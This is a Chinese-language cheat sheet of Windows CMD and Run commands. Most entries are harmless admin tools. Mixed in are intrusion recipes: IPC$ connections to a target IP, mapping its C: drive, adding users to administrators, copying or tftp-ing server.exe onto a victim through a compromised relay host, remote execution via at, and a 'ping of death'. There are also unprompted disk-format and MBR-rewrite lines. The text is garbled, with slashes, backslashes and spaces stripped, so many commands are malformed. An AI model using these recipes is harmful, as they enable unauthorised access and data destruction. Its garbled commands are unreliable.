CMD命令:开始运行键入cmd或command(在命令行里可以看到系统版本、文件系统版本appwiz。cpl:程序和功能calc:启动计算器certmgr。msc:证书管理实用程序charmap:启动字符映射表chkdsk。exe:Chkdsk磁盘检查(管理员身份运行命令提示符)cleanmgr:打开磁盘清理工具cliconfg:SQLSERVER客户端网络实用工具cmstp:连接管理器配置文件安装程序cmd。exe:CMD命令提示符自动关机命令Shutdownst600:表示600秒后自动关机shutdowna:可取消定时关机Shutdownrt600:表示600秒后自动重启rundll32user32。dll,LockWorkStation:表示锁定计算机colorcpl:颜色管理,配置显示器和打印机等中的色彩CompMgmtLauncher:计算机管理compmgmt。msc:计算机管理credwiz:备份或还原储存的用户名和密码comexp。msc:打开系统组件服务control:控制面版dcomcnfg:打开系统组件服务Dccw:显示颜色校准devmgmt。msc:设备管理器desk。cpl:屏幕分辨率dfrgui:优化驱动器Windows7dfrg。msc:磁盘碎片整理程序dialer:电话拨号程序diskmgmt。msc:磁盘管理dvdplay:DVD播放器dxdiag:检查DirectX信息eudcedit:造字程序eventvwr:事件查看器explorer:打开资源管理器Firewall。cpl:Windows防火墙FXSCOVER:传真封面编辑器fsmgmt。msc:共享文件夹管理器gpedit。msc:组策略hdwwiz。cpl:设备管理器inetcpl。cpl:Internet属性intl。cpl:区域iexpress:木马捆绑工具,系统自带joy。cpl:游戏控制器logoff:注销命令lusrmgr。msc:本地用户和组lpksetup:语言包安装删除向导,安装向导会提示下载语言包lusrmgr。msc:本机用户和组main。cpl:鼠标属性mmsys。cpl:声音magnify:放大镜实用程序mem。exe:显示内存使用情况(如果直接运行无效,可以先管理员身份运行命令提示符,在命令提示符里输入mem。exed:a。txt即可打开d盘查看a。txt,里面的就是内存使用情况了。当然什么盘什么文件名可自己决定。)MdSched:Windows内存诊断程序mmc:打开控制台mobsync:同步命令mplayer2:简易widnowsmediaplayerMsconfig。exe:系统配置实用程序msdt:微软支持诊断工具msinfo32:系统信息mspaint:画图Msra:Windows远程协助mstsc:远程桌面连接NAPCLCFG。MSC:客户端配置ncpa。cpl:网络连接narrator:屏幕讲述人Netplwiz:高级用户帐户控制面板,设置登陆安全相关的选项netstat:an(TC)命令检查接口notepad:打开记事本Nslookup:IP地址侦测器odbcad32:ODBC数据源管理器OptionalFeatures:打开打开或关闭Windows功能对话框osk:打开屏幕键盘perfmon。msc:计算机性能监测器perfmon:计算机性能监测器PowerShell:提供强大远程处理能力printmanagement。msc:打印管理powercfg。cpl:电源选项psr:问题步骤记录器Rasphone:网络连接Recdisc:创建系统修复光盘Resmon:资源监视器Rstrui:系统还原regedit。exe:注册表regedt32:注册表编辑器rsop。msc:组策略结果集sdclt:备份状态与配置,就是查看系统是否已备份secpol。msc:本地安全策略services。msc:本地服务设置sfcscannow:扫描错误并复原windows文件保护sfc。exe:系统文件检查器shrpubw:创建共享文件夹sigverif:文件签名验证程序slui:Windows激活,查看系统激活信息slmgr。vbsdlv:显示详细的许可证信息slmgr。vbsdli:显示许可证信息slmgr。vbsxpr:当前许可证截止日期slmgr。vbsdti:显示安装ID以进行脱机激slmgr。vbsipk:(ProductKey)安装产品密钥slmgr。vbsato:激活Windowsslmgr。vbscpky:从注册表中清除产品密钥(防止泄露引起的攻击)slmgr。vbsilc:(Licensefile)安装许可证slmgr。vbsupk:卸载产品密钥slmgr。vbsskms:(name〔ort〕)批量授权snippingtool:截图工具,支持无规则截图soundrecorder:录音机,没有录音时间的限制StikyNot:便笺sysdm。cpl:系统属性sysedit:系统配置编辑器syskey:系统加密,一旦加密就不能解开,保护系统的双重密码taskmgr:任务管理器(旧版)TM任务管理器(新版)taskschd。msc:任务计划程序timedate。cpl:日期和时间UserAccountControlSettings用户账户控制设置utilman:辅助工具管理器wf。msc:高级安全Windows防火墙WFS:Windows传真和扫描wiaacmgr:扫描仪和照相机向导winver:关于Windowswmimgmt。msc:打开windows管理体系结构(WMI)write:写字板wscui。cpl:操作中心wscript:windows脚本宿主设置wuapp:Windows更新1。gpedit。msc组策略2。sndrec32录音机3。NslookupIP地址侦测器,是一个监测网络中DNS服务器是否能正确实现域名解析的命令行工具。它在WindowsNT2000XP中均可使用,但在Windows98中却没有集成这一个工具。4。explorer打开资源管理器5。logoff注销命令6。shutdown60秒倒计时关机命令7。lusrmgr。msc本机用户和组8。services。msc本地服务设置9。oobemsoobea检查XP是否激活10。notepad打开记事本11。cleanmgr垃圾整理12。netstartmessenger开始信使服务13。compmgmt。msc计算机管理14。netstopmessenger停止信使服务15。conf启动netmeeting16。dvdplayDVD播放器17。charmap启动字符映射表18。diskmgmt。msc磁盘管理实用程序19。calc启动计算器20。dfrg。msc磁盘碎片整理程序21。chkdsk。exeChkdsk磁盘检查22。devmgmt。msc设备管理器23。regsvr32u。dll停止dll文件运行24。drwtsn32系统医生25。rononcep15秒关机26。dxdiag检查DirectX信息27。regedt32注册表编辑器28。Msconfig。exe系统配置实用程序29。rsop。msc组策略结果集30。mem。exe显示内存使用情况31。regedit。exe注册表32。winchatXP自带局域网聊天33。progman程序管理器34。winmsd系统信息35。perfmon。msc计算机性能监测程序36。winver检查Windows版本37。sfcscannow扫描错误并复原38。taskmgr任务管理器(2000xp200339。winver检查Windows版本40。wmimgmt。msc打开windows管理体系结构(WMI)41。wupdmgrwindows更新程序42。wscriptwindows脚本宿主设置43。write写字板44。winmsd系统信息45。wiaacmgr扫描仪和照相机向导46。winchatXP自带局域网聊天47。mem。exe显示内存使用情况48。Msconfig。exe系统配置实用程序49。mplayer2简易widnowsmediaplayer50。mspaint画图板51。mstsc远程桌面连接52。mplayer2媒体播放机53。magnify放大镜实用程序54。mmc打开控制台55。mobsync同步命令56。dxdiag检查DirectX信息57。iexpress木马捆绑工具,系统自带58。fsmgmt。msc共享文件夹管理器59。utilman辅助工具管理器60。diskmgmt。msc磁盘管理实用程序61。dcomcnfg打开系统组件服务62。ddeshare打开DDE共享设置110。osk打开屏幕键盘111。odbcad32ODBC数据源管理器112。oobemsoobea检查XP是否激活114。logoff注销命令66。notepad打开记事本67。nslookup网络管理的工具向导68。ntbackup系统备份和还原69。narrator屏幕讲述人70。ntmsmgr。msc移动存储管理器71。ntmsoprq。msc移动存储管理员操作请求72。netstatan(TC)命令检查接口73。syncapp创建一个公文包74。sysedit系统配置编辑器75。sigverif文件签名验证程序76。ciadv。msc索引服务程序77。shrpubw创建共享文件夹78。secpol。msc本地安全策略79。syskey系统加密,一旦加密就不能解开,保护windowsxp系统的双重密码80。services。msc本地服务设置81。Sndvol32音量控制程序82。sfc。exe系统文件检查器83。sfcscannowwindows文件保护84。ciadv。msc索引服务程序85。tourstartxp简介(安装完成后出现的漫游xp程序)86。taskmgr任务管理器87。eventvwr事件查看器88。eudcedit造字程序89。compmgmt。msc计算机管理90。packager对象包装程序91。perfmon。msc计算机性能监测程序92。charmap启动字符映射表93。cliconfgSQLSERVER客户端网络实用程序94。Clipbrd剪贴板查看器95。conf启动netmeeting96。certmgr。msc证书管理实用程序97。regsvr32u。dll停止dll文件运行98。regsvr32uzipfldr。dll取消ZIP支持99。cmd。exeCMD命令提示符100。chkdsk。exeChkdsk磁盘检查1。磁盘操作,fdisk隐含参数mbr重建主引导记录fdiskmbr重建主引导记录fdisk在DOS7。0以后增加了cmbr参数,可在挂接多个物理硬盘时,重建排序在后面的硬盘的主引导记录,例如:fdiskcmbr2,可重写第二个硬盘的主引导记录。(在使用时要十分小心,避免把好的硬盘引导记录损坏)format参数:q快速格式化u不可恢复autotest不提示s创建MSDOS引导盘formatc:quautotest2。目录操作DIR〔目录名或文件名〕〔S〕〔W〕〔P〕〔A〕列出目录参数:s查找子目录w只显示文件名p分页a显示隐藏文件DIRformat。exes查找该盘的format。exe文件并报告位置MD(MKDIR)〔目录名〕创建目录MKDIRHELLOWORLD创建HELLOWORLD目录CD(CHDIR)〔目录名〕PS:可以使用相对目录或绝对目录进入目录CDAA进入当前文件夹下的AA目录,cd。。进入上一个文件夹cd返回根目录;cdc:windows进入c:windows文件夹RD(RMDIR)〔目录名〕删除目录RDHELLOWORLD删除HELLOWORLD目录3。文件操作删除目录及其文件:rmdir〔目录名或文件名〕〔S〕〔W〕〔P〕〔A〕。例rmdirc:qqdownloads删除C盘的qqdownload目录。del〔目录名或文件名〕〔f〕〔s〕〔q〕删除参数:f删除只读文件s删除该目录及其下的所有内容q删除前不确认delc:delsq自动删除c盘的del目录。copy〔源文件或目录〕〔目标目录〕复制文件copyd:pwin98。c:presetup将d盘的pwin98的所有文件复制到c盘的presetup下。attrib〔参数〕〔源文件或目录〕文件属性操作命令,attrib命令可以列出或修改磁盘上文件的属性,文件属性包括文档(A)、只读(R)、隐藏(H)、系统(S),例如:attribhrsio。sys执行这一命令后,将把DOS系统文件io。sys文件的只读、隐藏、系统属性去掉,这时将可以直接通过dir命令看到io。sys文件。attribhrsautoexec。bat将为自动批处理文件增加以上属性。4。内存操作debug调试内存参数w〔文件名〕写入二进制文件o〔地址1〕〔地址2〕输出内存q退出exp:o7010〔return〕o7101〔return〕01〔return〕q〔return〕DOS下通过写70h71hPORT改变BIOS密码在CMOS中存放的对应位置的值,用以清除AWARDBIOS密码。debug还可以破解硬盘保护卡等,但只可以在纯DOS下用。5。分区操作给磁盘分区,一般都会分成四个区,磁盘分区由主分区、扩展分区、逻辑分区组成。PQ和AcronisDiskDirector这两个工具都可以在不丢失数据的情况下对分区进行调整大小,以及合并等操作,XP系统的话你用PQ,WIN7系统的话用AcronisDiskDirector操作基本一样,可以去网上找教程来看看,再不重装系统的情况下都能调整分区大小,但是建议你还是先备份下数据再调整,毕竟对硬盘直接进行的操作有一定的危险性。netuseipipcuser:建立IPC空链接netuseipipc密码user:用户名建立IPC非空链接netuseh:ipc密码user:用户名直接登陆后映射对方C:到本地为H:netuseh:ipc登陆后映射对方C:到本地为H:netuseipipcdel删除IPC链接netuseh:del删除映射对方到本地的为H:的映射netuser用户名密码add建立用户netuserguestactive:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名add把用户添加到管理员中使其具有管理员权限netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务nettime目标ip查看对方时间nettime目标ipset设置本地计算机时间与目标IP主机的时间同步,加上参数yes可取消确认信息netview查看本地局域网内开启了哪些共享netviewip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip文本信息向对方发信息netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc开启ipc开启ipc共享netshareipcdel删除ipcdel删除ipc共享netsharecdel删除C:共享netuserguest12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstata查看开启了哪些端口,常用netstatannetstatn查看端口的网络连接情况,常用netstatannetstatv查看正在进行的工作netstatp协议名例:netstatptcqip查看某协议使用情况netstats查看正在使用的所有协议使用情况nbtstatAip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名tracert参数ip(或计算机名)跟踪路由(数据包),参数:w数字用于设置超时间隔。pingip(或域名)向对方主机发送默认大小为32字节的数据,参数:l〔空格〕数据包大小;n发送数据次数;t指一直ping。pingtl65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数all显示全部配置信息tlistt以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内)killF进程名加F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Supporttools文件夹内)delF文件名加F参数后就可删除只读文件,AR、AH、AS、AA分别表示删除只读、隐藏、系统、存档文件,AR、AH、AS、AA表示删除除只读、隐藏、系统、存档以外的文件。例如DELAR。表示删除当前目录下所有只读文件,DELAS。表示删除当前目录下除系统文件以外的所有文件delSQ目录或用:rmdirsQ目录S删除目录及目录下的所有子目录和文件。同时使用参数Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符路径要移动的文件名存放移动文件的路径移动后文件名移动文件,用参数y将取消确认移动目录存在相同文件的提示就直接覆盖fcone。txttwo。txt3st。txt对比二个文件并把不同之处输出到3st。txt文件中,和是重定向命令atid号开启已注册的某个计划任务atdelete停止所有计划任务,用参数yes则不需要确认就直接停止atid号delete停止某个已注册的计划任务at查看所有的计划任务atiptime程序名(或一个命令)r在某时间运行对方某程序并重新启动计算机fingerusernamehost查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径文件名1路径文件名2y复制文件1到指定的目录为文件2,用参数y就同时取消确认你要改写一份现存目录文件copyc:srv。exeipadmin复制本地c:srv。exe到对方的admin下copy1st。jpgb2st。txta3st。jpg将2st。txt的内容藏身到1st。jpg中生成3st。jpg新的文件,注:2st。txt文件头要空三排,参数:b指二进制文件,a指ASCLL格式文件copyipadminsvv。exec:或:copyipadminsvv。exec:或:copyipadmin。复制对方admini共享下的srv。exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址目录名复制文件和目录树,用参数Y将不提示覆盖相同文件用参数e才可连目录下的子目录一起复制到目标地址下。tftpi自己IP(用肉机作跳板时这用肉机IP)getserver。exec:server。exe登陆后,将IP的server。exe下载到目标主机c:server。exe参数:i指以二进制模式传送,如传送exe文件时用,如不加i则以ASCII模式(传送文本文件模式)进行传送tftpi对方IPputc:server。exe登陆后,上传本地c:server。exe至主机ftpip端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)routeprint显示出IP路由,将主要显示网络地址Networkaddres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arpa将显示出全部信息start程序名或命令max或min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名ARSH或ARSH去掉(添加)某文件的存档,只读,系统,隐藏属性;用则是添加为某属性dir查看文件,参数:Q显示文件及目录属系统哪个用户,T:C显示文件创建时间,T:A显示文件上次被访问时间,T:W上次被修改时间datet、timet使用此参数即DATET、TIMET将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量pause暂停批处理程序,并显示出:请按任意键继续。if在批处理程序中执行条件处理(更多说明见if命令及变量)goto标签将cmd。exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如::start标签)call路径批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call?)for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置echo信息在屏幕上显示出信息echo信息pass。txt将信息保存到pass。txt文件中findstrHelloaa。txt在aa。txt文件中寻找字符串hellofind文件名查找某文件title标题名字更改CMD窗口标题名字color颜色值设置cmd控制台前景和背景颜色;0黑、1蓝、2绿、3浅绿、4红、5紫、6黄、7白、8灰、9淡蓝、A淡绿、B淡浅绿、C淡红、D淡紫、E淡黄、F亮白prompt名称更改cmd。exe的显示的命令提示符(把C:、D:统一改为:EntSky)ver在DOS窗口下显示版本信息winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format盘符FS:类型格式化磁盘,类型:FAT、FAT32、NTFS,例:FormatD:FS:NTFSmd目录名创建目录replace源文件要替换文件的目录替换文件ren原文件名新文件名重命名文件名tree以树形结构显示出目录,用参数f将列出第个文件夹中文件名称type文件名显示文本文件的内容more文件名逐屏显示输出文件doskey要锁定的命令字符doskey要解锁命令为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskeydirentsky(不能用doskeydirdir);解锁:doskeydirtaskmgr调出任务管理器chkdskFD:检查磁盘D并显示状态报告;加参数f并修复磁盘上的错误tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口exit退出cmd。exe程序或目前,用参数B则是退出当前批处理脚本而不是cmd。exepath路径可执行文件的文件名为可执行文件设置一个路径。cmd启动一个win2K命令解释窗口。参数:eff、en关闭、开启命令扩展;更我详细说明见cmd?regedits注册表文件名导入注册表;参数S指安静模式导入,无任何提示;regedite注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL)针对NTFS格式时。参数:D用户名:设定拒绝某用户访问;P用户名:perm替换指定用户的访问权限;G用户名:perm赋予指定用户访问权限;Perm可以是:N无,R读取,W写入,C更改(写入),F完全控制;例:caclsD:est。txtDpub设定d:est。txt拒绝pub用户访问。cacls文件名查看文件的访问用户权限列表REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况